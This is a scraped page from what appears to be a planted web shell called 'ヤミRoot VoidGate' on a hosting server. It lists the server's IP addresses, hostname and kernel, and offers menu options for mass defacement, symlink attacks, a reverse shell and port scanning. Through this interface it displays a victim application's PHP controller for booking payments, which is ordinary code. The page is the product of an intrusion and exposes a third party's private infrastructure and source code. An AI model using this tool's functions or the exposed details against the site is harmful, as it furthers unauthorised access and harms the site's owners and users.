ヤミRoot VoidGate
User / IP
:
216.73.216.137
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
api
/
src
/
AppBundle
/
Controller
/
Api
/
Viewing: BookingPaymentController.php
<?php namespace AppBundle\Controller\Api; use FOS\RestBundle\Controller\FOSRestController; use Symfony\Component\HttpFoundation\Request; use Symfony\Component\HttpFoundation\Response; use Symfony\Component\HttpFoundation\JsonResponse; use FOS\RestBundle\Controller\Annotations as Rest; use Sensio\Bundle\FrameworkExtraBundle\Configuration\ParamConverter; use Sensio\Bundle\FrameworkExtraBundle\Configuration\Security; use Nelmio\ApiDocBundle\Annotation as Doc; use AppBundle\Entity\Booking; use AppBundle\Entity\Payment; use AppBundle\Entity\Staff; use AppBundle\Entity\PaymentService; use AppBundle\Form\BookingType; class BookingPaymentController extends FOSRestController { /** * @Rest\Get("/bookings/{bookingId}/payments") * @Rest\View( * statusCode = Response::HTTP_OK, * SerializerGroups = {"LIST", "PAYMENT_DETAILS"} * ) * @Security("has_role('ROLE_OPERATOR')") * @Doc\ApiDoc( * section="Pay for a booking", * resource=true, * description="show the payments related to a booking( the list may content only one/zero item).", * ) */ public function listAction(Booking $booking) { $payments= $this ->getDoctrine() ->getManager() ->getRepository("AppBundle:Payment") ->findByBooking($booking); return $payments; } /** * @Rest\Get("/bookings/{bookingId}/payments/{paymentId}") * @Rest\View( * statusCode = Response::HTTP_OK, * SerializerGroups = {"LIST", "PAYMENT_DETAILS"} * ) * @Security("has_role('ROLE_OPERATOR')") * @Doc\ApiDoc( * section="Pay for a booking", * resource=true, * description="Show a particular payment.", * ) */ public function showAction(Payment $payment) { return $payment; } /** * The body of the request must be either <br ><br > * For Cash payment: <br> * { <br > * "paymentServiceId": Z, <br > * "amount": W <br > * } <br ><br> * or <br > <br > * Remote payment: <br> * { <br > * "paymentServiceId": Z, <br > * "paymentReference": Z, <br > * "amount": W <br > * } <br > * <br > * * NOTE:the X-Auth-Token contains link to the user making the payment * * @Rest\Post("/bookings/{bookingId}/payments") * @Rest\View( * statusCode = Response::HTTP_CREATED, * SerializerGroups = {"LIST", "PAYMENT_DETAILS"} * ) * @Doc\ApiDoc( * section="Pay for a booking", * resource=true, * description="Pay for a booking.", * ) * @Security("has_role('ROLE_CUSTOMER') or has_role('ROLE_OPERATOR')") */ public function createAction(Request $request, Booking $booking) { $checker = $this->get('security.authorization_checker'); $paymentManager =$this->get('payment_manager'); $em = $this ->getDoctrine() ->getManager(); if($checker->isGranted('ROLE_OPERATOR')){ $operator = $this->get('security.token_storage')->getToken()->getUser(); }else { $operator = null; } /** * fetching the amount */ if ($request->request->has("amount")) { $paymentAmount = $request->request->get("amount"); //the amount of the actual deposit } else { return new JsonResponse(['Error' => 'missing \"amount\"'], JsonResponse::HTTP_BAD_REQUEST); } /** * fetching the paymentService */ if ($request->request->has("paymentServiceId")) { $paymentServiceID =$request->request->get('paymentServiceId'); $paymentService = $em ->getRepository('AppBundle:PaymentService') ->find($paymentServiceID); if ($paymentService == null) { return new JsonResponse(['Error' => 'no paymentService with id: '.$paymentServiceID], JsonResponse::HTTP_NOT_FOUND); }elseif ($paymentService->getType() == PaymentService::TYPE_CASH AND $operator == null ) { return new JsonResponse(['Error' => 'customers pay online only with e_payments'], JsonResponse::HTTP_BAD_REQUEST); } } else { return new JsonResponse(['Error' => 'missing \"paymentServiceId\"'], JsonResponse::HTTP_BAD_REQUEST); } /** * fetching the payment reference */ if ($request->request->has("paymentReference")) { $reference =$request->request->get('paymentReference'); }elseif ($operator != null) { //we allow payment with no reference number only if it is an operator receiving a cash deposit $reference = null; }else{ // In case of electronical payments, a reference number is needed. return new JsonResponse(['Error' => 'missing "paymentReference"'], JsonResponse::HTTP_BAD_REQUEST); } /** * Control if the booking is already paid */ if( $paymentManager->isPaid($booking)){ return new JsonResponse(['Error' => 'Booking already paid'], JsonResponse::HTTP_BAD_REQUEST); } $sitCost = $booking ->getTravel() ->getSitCost(); //the price of the sit if($sitCost == $paymentAmount){ $payment = $paymentManager->finishPayment($booking, $paymentService, $paymentAmount, $reference, $operator); return $payment; } return new JsonResponse(['Error' => 'the paid amount is less than required: paid=>'.$paymentAmount.' ; sitCost=>'.$sitCost], JsonResponse::HTTP_NOT_FOUND); } /** * @Rest\Put("/bookings/{bookingId}/payments/{paymentId}") * @Rest\View( * statusCode = Response::HTTP_ACCEPTED, * SerializerGroups = {"LIST", "PAYMENT_DETAILS"} * ) */ public function updateAction(Booking $booking) { return new JsonResponse(['Error' => 'update forbidden'], JsonResponse::HTTP_FORBIDDEN); } /** * @Rest\Delete("/bookings/{bookingId}/payments/{paymentId}") * @Rest\View( * statusCode = JsonResponse::HTTP_OK * ) */ public function deleteAction(Booking $booking) { return new JsonResponse(['Error' => 'delete forbidden'], JsonResponse::HTTP_FORBIDDEN); } }
Coded With 💗 by
0x6ick